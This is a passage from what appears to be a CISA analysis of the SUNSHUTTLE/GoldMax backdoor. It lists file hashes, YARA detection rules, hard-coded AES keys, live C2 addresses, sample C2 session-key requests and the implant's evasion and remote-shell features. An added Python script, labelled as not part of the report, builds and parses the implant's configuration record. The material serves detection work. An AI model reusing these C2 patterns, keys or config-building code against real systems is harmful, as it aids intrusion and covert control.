as SUNSHUTTLE/Goldmax\r\nmalware. 
The executable is UPX packed, and when executed, the application will unpack and execute\r\n(fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836) in memory.\r\nfa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\r\nTags\r\nbackdoortrojan\r\nDetails\r\nName WindowsDSVC.exe_Unpacked\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 11 of 44\n\nSize 5180928 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 4de28110bfb88fdcdf4a0133e118d998\r\nSHA1 84ae7c2fee1c36822c8b3e54aef31e82d86613c1\r\nSHA256 fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\r\nSHA512 2202852702404e60aeb642cda3ecfe0136a39bac04d86a746c987fbcbd14be3b763961b67a19a013e23e66c8f0c0c03050933e2e27eeb8d60\r\nssdeep 49152:I4iyaNa/K/kLYvlGbdc55w/g0EuV+lU/VNW5HzuFNRQNAQQik2NXST9yXMw+37KI:nogIYY4bdaVE+lUNNW5iCvXno+A\r\nEntropy 5.962488\r\nAntivirus\r\nAhnlab Trojan/Win64.Cobalt\r\nBitDefender Gen:Variant.Bulz.370300\r\nClamAV Win.Malware.SUNSHUTTLE-9838970-0\r\nESET a variant of WinGo/Agent.AE trojan\r\nEmsisoft Gen:Variant.Bulz.370300 (B)\r\nIkarus Trojan.Crypter\r\nLavasoft Gen:Variant.Bulz.370300\r\nMicrosoft Security Essentials Trojan:Win64/GoldMax.A!dha\r\nSophos Mal/GoldMax-A\r\nSystweak trojan-backdoor.sunshuttle-r\r\nYARA Rules\r\nrule CISA_3P_10327841_02 : SOLARFLARE trojan\r\n{\r\n   meta:\r\n       Author = \"CISA Trusted Third Party\"\r\n       Incident = \"10327841.r1.v1\"\r\n       Date = \"2021-03-04\"\r\n       Actor = \"n/a\"\r\n       Category = \"Trojan\"\r\n       Family = \"SOLARFLARE\"\r\n       Description = \"Detects strings in WindowsDSVC_exe samples\"\r\n       MD5_1 = \"4de28110bfb88fdcdf4a0133e118d998\"\r\n       SHA256_1 = \"fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\"\r\n   strings:\r\n       $Go_Lang = \"Go build ID:\"\r\n       $main_func = \"main.main\"\r\n       $main_encrypt = \"main.encrypt\"\r\n       $main_MD5 = \"main.GetMD5Hash\"\r\n       
$main_beacon = \"main.beaconing\"\r\n       $main_command = \"main.resolve_command\"\r\n       $main_key1 = \"main.request_session_key\"\r\n       $main_key2 = \"main.retrieve_session_key\"\r\n       $main_clean = \"main.clean_file\"\r\n       $main_wget = \"main.wget_file\"\r\n   condition:\r\n       (uint16(0) == 0x5A4D) and all of them\r\n}\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 12 of 44\n\nrule FireEye_21_00004531_01 : SUNSHUTTLE backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2021-03-04\"\r\n       Last_Modified = \"20210305_1704\"\r\n       Actor = \"UNC2452\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNSHUTTLE\"\r\n       Description = \"This rule detects strings found in SUNSHUTTLE\"\r\n       MD5_1 = \"9466c865f7498a35e4e1a8f48ef1dffd\"\r\n       SHA256_1 = \"b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\"\r\n   strings:\r\n       $s1 = \"main.request_session_key\"\r\n       $s2 = \"main.define_internal_settings\"\r\n       $s3 = \"main.send_file_part\"\r\n       $s4 = \"main.clean_file\"\r\n       $s5 = \"main.send_command_result\"\r\n       $s6 = \"main.retrieve_session_key\"\r\n       $s7 = \"main.save_internal_settings\"\r\n       $s8 = \"main.resolve_command\"\r\n       $s9 = \"main.write_file\"\r\n       $s10 = \"main.beaconing\"\r\n       $s11 = \"main.wget_file\"\r\n       $s12 = \"main.fileExists\"\r\n       $s13 = \"main.removeBase64Padding\"\r\n       $s14 = \"main.addBase64Padding\"\r\n       $s15 = \"main.delete_empty\"\r\n       $s16 = \"main.GetMD5Hash\"\r\n   condition:\r\n       filesize\u003c10MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (5 of them)\r\n}\r\nrule FireEye_21_00004531_02 : SUNSHUTTLE backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2021-03-04\"\r\n       Last_Modified = \"20210305_1704\"\r\n       Actor = \"UNC2452\"\r\n       Category = \"Backdoor\"\r\n       Family = 
\"SUNSHUTTLE\"\r\n       Description = \"This rule detects strings found in SUNSHUTTLE\"\r\n       MD5_1 = \"9466c865f7498a35e4e1a8f48ef1dffd\"\r\n       SHA256_1 = \"b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\"\r\n   strings:\r\n       $s1 = \"LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk\"\r\n       $s2 = \"LS0tLS1FTkQgUFJJVkFURSBLRVktLS0tLQ\"\r\n       $s3 = \"Go build ID: \\\"\"\r\n   condition:\r\n       filesize\u003c10MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and all of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash 91802a615b3a5c4bcc05bc5f66a5b219\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 13 of 44\n\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nd9e458c1580f06a7f3f2929f5400a209 header 1536 1.227428\r\n97e1f8721f9fae6297bdcceb13887e95 .text 2404352 5.902419\r\nead2f864cd6d16d33f7282151865be45 .rdata 2512384 5.344095\r\nb51b1bb5decadc56e32f8288fc400c68 .data 260608 5.551173\r\nace875ec125258b2042837d2a2443781 .idata 1536 2.877753\r\n07b5472d347d42780469fb2654b7fc54 .symtab 512 0.020393\r\nRelationships\r\nfa1959dd38... Contained_Within f28491b367375f01fb9337ffc137225f4f232df4e074775dd2cc7e667394651c\r\nfa1959dd38... Connected_To 185.225.69.69\r\nDescription\r\nThe file is an 64-bit Windows executable file. This file is the UPX unpacked sample from the UPX packed sample\r\n\"WindowsDSVC.exe\" (f28491b367375f01fb9337ffc137225f4f232df4e074775dd2cc7e667394651c). The application is\r\nwritten in the Golang (Go) open-source language. When executed, the malware terminates its code execution if the victim’s\r\nsystem MAC address is equal to a hard-coded Hyper-V sandbox default MAC address value: \"c8:27:cc:c2:37:5a.\" If not, the\r\nmalware will proceed to check if the file \"%current directory%\\runlog.dat.tmp\" is installed on the compromised system. 
If\r\nthe file is not present, it creates the configuration data, encrypts it with the Advanced Encryption Standard (AES)-256\r\nalgorithm using the hard-coded key \"u66vk8e1xe0qpvs2ecp1d14y3qx3d334\" (32 ASCII characters, i.e. a 256-bit key), and Base64\r\nencodes the ciphertext with a custom Base64 alphabet in which the \"=\" padding character is replaced with null (so stored values\r\ncarry no trailing \"=\"), before storing the result in \"runlog.dat.tmp\" in the current directory.\r\nDisplayed below is the format of the configuration before being encrypted and encoded:\r\n   --Begin configuration data--\r\nFormat: MD5 hash of the current time|5-15|0|0|base64 encoded user-agent string\r\nSample observed: 8aebf98f920a2a198c00d87c246572b9|5-15|0|0|TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NzUuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8\r\n--End configuration data--\r\nThe configuration fields, in order, are: MD5 hash of the current time | the number range used by its pseudorandom number generator\r\n(PRNG) | fake request network traffic feature enabled (1) or disabled (0) | activation date | Base64-encoded User-Agent string used for\r\nthe requests | padding bytes.\r\nIt will attempt to send an HTTP GET request to its C2 server for a session key. 
The GET request contains a custom cookie\r\n(carrying the unique identifier value for the implant) for authentication, the hard-coded User-Agent string, and an HTTP Referer value\r\npseudo-randomly selected from the list of websites below to mask the C2 traffic:\r\n--Begin randomized HTTP referer--\r\nwww[.]google.com\r\nwww[.]bing.com\r\nwww[.]facebook.com\r\nwww[.]mail.com\r\n--End randomized HTTP referer--\r\nIt contains the following hard-coded legitimate and C2 Uniform Resource Identifiers (URIs):\r\n--Begin C2 URIs--\r\nhttps[:]//185.225.69.69/live\r\nhttps[:]//185.225.69.69/icon.ico\r\nhttps[:]//185.225.69.69/icon.png\r\nhttps[:]//185.225.69.69/script.js\r\nhttps[:]//185.225.69.69/style.css\r\nhttps[:]//185.225.69.69/css/bootstrap.css\r\nhttps[:]//185.225.69.69/scripts/jquery.js\r\nhttps[:]//185.225.69.69/scripts/bootstrap.js\r\nhttps[:]//185.225.69.69/css/style.css\r\n--End C2 URIs--\r\n--Begin legitimate URIs--\r\nhttps[:]//www.gstatic.com/images/?\r\nhttps[:]//ssl.gstatic.com/ui/v3/icons\r\nhttps[:]//fonts.gstatic.com/s/font.woff2\r\nhttps[:]//cdn.google.com/index\r\nhttps[:]//code.jquery.com/\r\nhttps[:]//cdn.mxpnl.com/\r\n--End legitimate URIs--\r\nDisplayed below is a sample GET request for a session key. Note that the value of the first cookie is the MD5 value from the first\r\nfield of the configuration sample above:\r\n--Begin sample request--\r\nGET /live/ HTTP/1.1\r\nHost: 185.225.69.69\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nConnection: Keep-Alive\r\nCookie: wDacJ87epY=8aebf98f920a2a198c00d87c246572b9; hBZ38QSGIR7UgOKT=NZQWAvMR6VGKA;\r\n0aUvm7fgB4UB5=IhFr8BnqYbP8ZZg1Zi8VPQWKQTXdRG8q; CLAshlHL1M=114\r\nReferer: www[.]google.com\r\nAccept-Encoding: gzip\r\n--End sample request--\r\nThe response payload was not available for analysis.\r\nAnalysis indicates that after receiving the response payload from its C2, it will send another HTTP GET request to its C2\r\nsimilar to the above GET request; the only difference is the value of one of the cookies. 
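The following Python script is an added example; it is not part of the CISA report and not code from SUNSHUTTLE/GoldMax. It builds and parses the cleartext configuration record described above and checks the link between its first field and the Cookie header of the session-key request. The AES-256 layer is deliberately not reproduced, because the report does not state the cipher mode or how an IV is handled; the padding-free Base64 (the = character dropped on encode and restored on decode) is reproduced as described. The record, cookie and User-Agent values are the ones quoted above; the timestamp text hashed into the implant identifier, the function names and the treatment of the trailing padding field are the example's own assumptions.

```python
import base64
import hashlib

# Added example, not from the CISA report or the malware: the cleartext
# SUNSHUTTLE/GoldMax configuration record before AES-256 is applied. The AES
# step is omitted (mode and IV handling are not given in the report); the
# pipe-delimited layout and the padding-free Base64 are as the report describes.

# Values quoted in the report: the observed record, the session-key request
# cookie, and the hard-coded User-Agent.
OBSERVED_RECORD = (
    '8aebf98f920a2a198c00d87c246572b9|5-15|0|0|'
    'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NzUuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8'
)
OBSERVED_COOKIE = ('wDacJ87epY=8aebf98f920a2a198c00d87c246572b9; hBZ38QSGIR7UgOKT=NZQWAvMR6VGKA; '
                   '0aUvm7fgB4UB5=IhFr8BnqYbP8ZZg1Zi8VPQWKQTXdRG8q; CLAshlHL1M=114')
FIREFOX_75_UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0'


def b64_nopad_encode(data):
    '''Standard Base64 with the trailing = padding removed, as the report describes.'''
    return base64.b64encode(data).decode('ascii').rstrip('=')


def b64_nopad_decode(text):
    '''Restore the dropped padding (length must be a multiple of 4) and decode.'''
    return base64.b64decode(text + '=' * (-len(text) % 4))


def implant_id(clock_text):
    '''MD5 of a timestamp string. Assumption: the exact time format hashed is not given in the report.'''
    return hashlib.md5(clock_text.encode('utf-8')).hexdigest()


def build_record(ident, prng_low, prng_high, fake_traffic, activation, user_agent):
    '''Assemble the five fields in the order quoted above; the padding-bytes field is not emitted (assumption).'''
    return '|'.join([
        ident,
        str(prng_low) + '-' + str(prng_high),
        '1' if fake_traffic else '0',
        str(activation),
        b64_nopad_encode(user_agent.encode('utf-8')),
    ])


def parse_record(record):
    '''Validate and split a cleartext record; raises ValueError on a malformed field.'''
    fields = record.split('|')
    if len(fields) < 5:
        raise ValueError('expected at least 5 pipe-separated fields, got ' + str(len(fields)))
    ident, prng, fake, activation, ua_b64 = fields[:5]
    if len(ident) != 32 or any(c not in '0123456789abcdef' for c in ident):
        raise ValueError('field 1 is not a lowercase MD5 hex digest')
    low, dash, high = prng.partition('-')
    if dash != '-' or not (low.isdigit() and high.isdigit()):
        raise ValueError('field 2 is not a low-high PRNG range')
    if fake not in ('0', '1'):
        raise ValueError('field 3 (fake-traffic flag) must be 0 or 1')
    return {
        'implant_id': ident,
        'prng_range': (int(low), int(high)),
        'fake_traffic': fake == '1',
        'activation': activation,
        'user_agent': b64_nopad_decode(ua_b64).decode('utf-8', 'replace'),
        'padding': '|'.join(fields[5:]),  # anything after the five known fields
    }


def cookie_values(cookie_header):
    '''name=value pairs from a Cookie header, as a dict.'''
    pairs = {}
    for part in cookie_header.split(';'):
        name, _, value = part.strip().partition('=')
        if name:
            pairs[name] = value
    return pairs


def record_matches_cookie(record, cookie_header):
    '''True when the record implant id is carried as one of the cookie values.'''
    return record['implant_id'] in cookie_values(cookie_header).values()


if __name__ == '__main__':
    observed = parse_record(OBSERVED_RECORD)
    print(observed)
    print('implant id present in session-key cookie:', record_matches_cookie(observed, OBSERVED_COOKIE))
    print(build_record(implant_id('2021-03-17 10:36:35'), 5, 15, False, 0, FIREFOX_75_UA))
```

The observed Base64 field in the report is cut off before the 75.0 version suffix, so decoding it yields the User-Agent up to Firefox/; the round trip through build_record uses the full string. In practice the record is what you would expect to see after stripping the AES layer from runlog.dat.tmp, and the implant id it carries is what ties that file to the proxy logs of the same host.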
The malware sends the following traffic to blend in with real traffic if the fake request network traffic feature in the configuration is enabled (set to 1). Displayed below are sample requests:\r\n--Begin request--\r\nGET /ui/v3/icons/ HTTP/1.1\r\nHost: ssl[.]gstatic.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nConnection: Keep-Alive\r\nReferer: www[.]google.com\r\nAccept-Encoding: gzip\r\n--End request--\r\n--Begin request--\r\nGET /css/bootstrap.css/ HTTP/1.1\r\nHost: 185[.]225.69.69\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nConnection: Keep-Alive\r\nReferer: www[.]facebook.com\r\nAccept-Encoding: gzip\r\n--End request--\r\nThe malware is designed to receive commands from its C2 that allow its remote operator to download and execute files, upload files, start a command shell, and update the malware configuration data fields (overwriting the existing data in its configuration file with the new configuration data from the remote operator). 
The configuration data file can allow the remote operator to set a new activation date, update the number range used by its PRNG, enable or disable the fake request network traffic feature, and replace the existing URI and User-Agent values.\r\nThe malware contains a Base64-encoded RSA private key that may be used to decrypt the RSA Optimal Asymmetric Encryption Padding (OAEP) encrypted session key received from its C2.\r\nb9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\r\nTags\r\nbackdoor, trojan\r\nDetails\r\nName Lexicon.exe\r\nSize 2036736 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 9466c865f7498a35e4e1a8f48ef1dffd\r\nSHA1 72e5fc82b932c5395d06fd2a655a280cf10ac9aa\r\nSHA256 b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\r\nSHA512 7efa5f638b31b95637a497714b1b33b63abdd72afb035df574a195d20d37381a53f934e0908813dea513f46a4d7cda6a16a0511a721dd8e09\r\nssdeep 49152:Om9E2fAhvsWGCDWMcvIODKsGHgNhX69CFoGlvcpTcVIa:61lIl1mlgb9aGdH\r\nEntropy 7.874690\r\nAntivirus\r\nAhnlab Backdoor/Win32.Sunshuttle\r\nAntiy Trojan[Backdoor]/Win64.Agent\r\nAvira TR/Sunshuttle.A\r\nBitDefender Trojan.GenericKD.34453763\r\nClamAV Win.Malware.SUNSHUTTLE-9838969-0\r\nComodo Malware\r\nCyren W64/Trojan.VYRP-8655\r\nESET a variant of WinGo/Agent.AE trojan\r\nEmsisoft Trojan.GenericKD.34453763 (B)\r\nIkarus Trojan.Win64.Rozena\r\nK7 Trojan ( 00578be81 )\r\nLavasoft Trojan.GenericKD.34453763\r\nQuick Heal Trojan.Agent\r\nSophos Troj/GoldMax-A\r\nSymantec Backdoor.GoldMax\r\nTrendMicro Backdoo.207681C5\r\nTrendMicro House Call Backdoo.207681C5\r\nVirusBlokAda Trojan.Win64.WinGo\r\nZillya! 
Trojan.APosT.Win32.1814\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash e58ab46f2a279ded0846d81bf0fa21f7\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n29214ad437f160f5bd92db6f746ecd8f header 512 2.447284\r\nd41d8cd98f00b204e9800998ecf8427e UPX0 0 0.000000\r\n02892067ad6acb49bb6de6eddcae1f78 UPX1 2035712 7.875271\r\n74553568f3052911c6df3835582d3b64 UPX2 512 1.763456\r\nRelationships\r\nb9a2c986b6... Contains 94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45\r\nDescription\r\nThis file is a 64-bit Windows executable written in Golang (Go) and was identified as SUNSHUTTLE/Goldmax malware. The executable is UPX packed; when executed, the application unpacks and executes the embedded payload (94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45) in memory.\r\n94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45\r\nTags\r\nbackdoor, trojan\r\nDetails\r\nName Lexicon.exeUnPacked\r\nSize 5177856 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 ab248df75dd6cc1b19329145b296421d\r\nSHA1 dec462b578a521ac38bbe7cf10c84f1b4bd33415\r\nSHA256 94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45\r\nSHA512 25c458c2ec3ad87434d40a947247675fe4befb424cde5dc99645936076ed1d2b87d1ede9c43b045c11827874eaccb0b28d30bbe36354237e\r\nssdeep 49152:msEdwffUXL8uWH0zMoJmv2vzczcEPAizHjvPXIYXfc8N09uvO+CWh9i2H87i3FMh:dRG4u40z9BEcEPA+HjvwSqic1+A\r\nEntropy 5.962959\r\nAntivirus\r\nAhnlab Trojan/Win64.Cobalt\r\nAvira TR/Sunshuttle.AF\r\nBitDefender Generic.GoldMax.A.0F52032B\r\nClamAV Win.Malware.SUNSHUTTLE-9838970-0\r\nComodo Malware\r\nCyren W64/Trojan.YCHA-1477\r\nESET a variant of WinGo/Agent.AE trojan\r\nEmsisoft Generic.GoldMax.A.0F52032B (B)\r\nIkarus Trojan.Crypter\r\nK7 Trojan ( 00578be81 )\r\nLavasoft 
Generic.GoldMax.A.0F52032B\r\nMicrosoft Security Essentials Trojan:Win32/GoldMax!MSR\r\nNANOAV Trojan.Win64.Sunshuttle.iodoxr\r\nQuick Heal Trojan.Generic\r\nSophos Troj/GoldMax-A\r\nSymantec Trojan.Gen.MBT\r\nSystweak trojan-backdoor.sunshuttle-r\r\nTrendMicro Backdoo.B97FD07F\r\nTrendMicro House Call Backdoo.B97FD07F\r\nVirusBlokAda Trojan.Glupteba\r\nZillya! Trojan.Agent.Win64.7447\r\nYARA Rules\r\nrule CISA_3P_10327841_02 : SOLARFLARE trojan\r\n{\r\n   meta:\r\n       Author = \"CISA Trusted Third Party\"\r\n       Incident = \"10327841.r1.v1\"\r\n       Date = \"2021-03-04\"\r\n       Actor = \"n/a\"\r\n       Category = \"Trojan\"\r\n       Family = \"SOLARFLARE\"\r\n       Description = \"Detects strings in WindowsDSVC_exe samples\"\r\n       MD5_1 = \"4de28110bfb88fdcdf4a0133e118d998\"\r\n       SHA256_1 = \"fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\"\r\n   strings:\r\n       $Go_Lang = \"Go build ID:\"\r\n       $main_func = \"main.main\"\r\n       $main_encrypt = \"main.encrypt\"\r\n       $main_MD5 = \"main.GetMD5Hash\"\r\n       $main_beacon = \"main.beaconing\"\r\n       $main_command = \"main.resolve_command\"\r\n       $main_key1 = \"main.request_session_key\"\r\n       $main_key2 = \"main.retrieve_session_key\"\r\n       $main_clean = \"main.clean_file\"\r\n       $main_wget = \"main.wget_file\"\r\n   condition:\r\n       (uint16(0) == 0x5A4D) and all of them\r\n}\r\nrule FireEye_21_00004531_01 : SUNSHUTTLE backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2021-03-04\"\r\n       Last_Modified = \"20210305_1704\"\r\n       Actor = \"UNC2452\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNSHUTTLE\"\r\n       Description = \"This rule detects strings found in SUNSHUTTLE\"\r\n       MD5_1 = \"9466c865f7498a35e4e1a8f48ef1dffd\"\r\n       SHA256_1 = \"b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\"\r\n   
strings:\r\n       $s1 = \"main.request_session_key\"\r\n       $s2 = \"main.define_internal_settings\"\r\n       $s3 = \"main.send_file_part\"\r\n       $s4 = \"main.clean_file\"\r\n       $s5 = \"main.send_command_result\"\r\n       $s6 = \"main.retrieve_session_key\"\r\n       $s7 = \"main.save_internal_settings\"\r\n       $s8 = \"main.resolve_command\"\r\n       $s9 = \"main.write_file\"\r\n       $s10 = \"main.beaconing\"\r\n       $s11 = \"main.wget_file\"\r\n       $s12 = \"main.fileExists\"\r\n       $s13 = \"main.removeBase64Padding\"\r\n       $s14 = \"main.addBase64Padding\"\r\n       $s15 = \"main.delete_empty\"\r\n       $s16 = \"main.GetMD5Hash\"\r\n   condition:\r\n       filesize\u003c10MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (5 of them)\r\n}\r\nrule FireEye_21_00004531_02 : SUNSHUTTLE backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2021-03-04\"\r\n       Last_Modified = \"20210305_1704\"\r\n       Actor = \"UNC2452\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNSHUTTLE\"\r\n       Description = \"This rule detects strings found in SUNSHUTTLE\"\r\n       MD5_1 = \"9466c865f7498a35e4e1a8f48ef1dffd\"\r\n       SHA256_1 = \"b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\"\r\n   strings:\r\n       $s1 = \"LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk\"\r\n       $s2 = \"LS0tLS1FTkQgUFJJVkFURSBLRVktLS0tLQ\"\r\n       $s3 = \"Go build ID: \\\"\"\r\n   condition:\r\n       filesize\u003c10MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and all of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash 91802a615b3a5c4bcc05bc5f66a5b219\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n8ff4385790edf4dc360cdf709edefacb header 1536 1.209291\r\ne7c248921feb7147df53d3c4c1c4481f .text 2402816 
5.902294\r\nd6a5f7faecd7889cd4463e7dca0c1bb0 .rdata 2510848 5.344525\r\n842570d7d75648b08153f61c3ad2db42 .data 260608 5.551951\r\n99830eca3610cfe7885679f26396b285 .idata 1536 2.879055\r\n07b5472d347d42780469fb2654b7fc54 .symtab 512 0.020393\r\nRelationships\r\n94c58c7fb4... Connected_To reyweb.com\r\n94c58c7fb4... Contained_Within b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\r\nDescription\r\nThe file is a 64-bit Windows executable. This file is the UPX-unpacked sample from the UPX-packed sample \"Lexicon.exe\" (b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8). The application is written in the Golang (Go) open-source language. When executed, the malware terminates its code execution if the victim’s system MAC address is equal to a hard-coded Hyper-V sandbox default MAC address value: \"c8:27:cc:c2:37:5a.\" If not, the malware proceeds to check whether the file \"%current directory%\\config.dat.tmp\" is installed on the compromised system. 
If the file is not installed, it creates configuration data and encrypts it using the AES-256 encryption algorithm with the hard-coded key \"hz8l2fnpvp71ujfy8rht6b0smouvp9k8.\" The encrypted data is Base64 encoded using a custom Base64 alphabet (\"=\" replaced with null) before being stored in \"config.dat.tmp\" in the current directory.\r\nDisplayed below is the format of the configuration before being encrypted and encoded:\r\n--Begin configuration data--\r\nFormat: MD5 hash of the current time|5-15|0|0|base64 encoded user-agent string\r\nSample observed: d2ed208623fa66d2e5372c27c9230fb8|5-15|0|0|TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NzUuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8\r\n--End configuration data--\r\nThe configuration contains: MD5 hash of the current time | the number range used by its PRNG | enable and disable fake request network traffic feature | activation date | Base64 encoded user-agent string used for the requests | padding bytes.\r\nIt will attempt to send an HTTP GET request to its C2 server for a session key. 
The GET request contains a custom cookie (a unique identifier value for the implant) for authentication, a hard-coded User-Agent string, and a pseudo-randomly selected HTTP referer value chosen from the list of websites below to mask C2 traffic:\r\n--Begin randomized HTTP referer--\r\nwww[.]bing.com\r\nwww[.]google.com\r\nwww[.]facebook.com\r\nwww[.]yahoo.com\r\n--End randomized HTTP referer--\r\nIt contains the following hard-coded legitimate and C2 URIs:\r\n--Begin C2 URIs--\r\nhttps[:]//reyweb.com/icon.ico\r\nhttps[:]//reyweb.com/icon.png\r\nhttps[:]//reyweb.com/script.js\r\nhttps[:]//reyweb.com/style.css\r\nhttps[:]//reyweb.com/css/style.css\r\nhttps[:]//reyweb.com/assets/index.php\r\nhttps[:]//reyweb.com/css/bootstrap.css\r\nhttps[:]//reyweb.com/scripts/jquery.js\r\nhttps[:]//reyweb.com/scripts/bootstrap.js\r\n--End C2 URIs--\r\n--Begin legitimate URIs--\r\nhttps[:]//ssl.gstatic.com/ui/v3/icons\r\nhttps[:]//cdn.cloudflare.com\r\nhttps[:]//cdn.mxpnl.com\r\nhttps[:]//cdn.google.com\r\nhttps[:]//cdn.jquery.com/index\r\n--End legitimate URIs--\r\nDisplayed below is a sample GET request for a session key:\r\n--Begin sample request--\r\nGET /assets/index.php HTTP/1.1\r\nHost: reyweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nCookie: HjELmFxKJc=d2ed208623fa66d2e5372c27c9230fb8; P5hCrabkKf=gZLXIeKI; iN678zYrXMJZ=i4zICToyI70Yeidf1f7rWjm5foKX2Usx; b7XCoFSvs1YRW=78\r\nReferer: www[.]yahoo.com\r\nAccept-Encoding: gzip\r\n--End sample request--\r\nThe response payload was not available for analysis.\r\nAnalysis indicates that after receiving the response payload from its C2, the malware sends another HTTP GET request to its C2 similar to the above GET request, the only difference being the value of one of the cookies. 
The malware sends the following traffic to blend in with real traffic if the fake request network traffic feature in the configuration is enabled (set to 1). Displayed below are sample requests:\r\n--Begin request--\r\nGET /ui/v3/icons HTTP/1.1\r\nHost: ssl[.]gstatic.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nConnection: Keep-Alive\r\nReferer: www[.]google.com\r\nAccept-Encoding: gzip\r\n--End request--\r\n--Begin request--\r\nGET /css/bootstrap.css HTTP/1.1\r\nHost: reyweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nConnection: Keep-Alive\r\nReferer: www[.]facebook.com\r\nAccept-Encoding: gzip\r\n--End request--\r\nThe malware is designed to receive commands from its C2 that allow its remote operator to download and execute files, upload files, start a command shell, and update the malware configuration data fields (overwriting the existing data in its configuration file with the new configuration data from the remote operator). 
The configuration data file can allow the remote operator to set a new activation date, update the number range used by its PRNG, enable or disable the fake request network traffic feature, and replace the existing URI and User-Agent values.\r\nThe malware contains a Base64-encoded RSA private key that may be used to decrypt the RSA OAEP encrypted session key received from its C2.\r\nreyweb.com\r\nTags\r\ncommand-and-control\r\nURLs\r\nreyweb.com/assets/index.php\r\nreyweb.com/css/bootstrap.css\r\nreyweb.com/css/style.css\r\nreyweb.com/icon.ico\r\nreyweb.com/icon.png\r\nreyweb.com/script.js\r\nreyweb.com/scripts/bootstrap.js\r\nreyweb.com/scripts/jquery.js\r\nreyweb.com/style.css\r\nHTTP Sessions\r\nGET /assets/index.php HTTP/1.1\r\nHost: reyweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nCookie: HjELmFxKJc=d2ed208623fa66d2e5372c27c9230fb8; P5hCrabkKf=gZLXIeKI; iN678zYrXMJZ=i4zICToyI70Yeidf1f7rWjm5foKX2Usx; b7XCoFSvs1YRW=78\r\nReferer: www[.]yahoo.com\r\nAccept-Encoding: gzip\r\nGET /assets/index.php HTTP/1.1\r\nHost: reyweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nCookie: 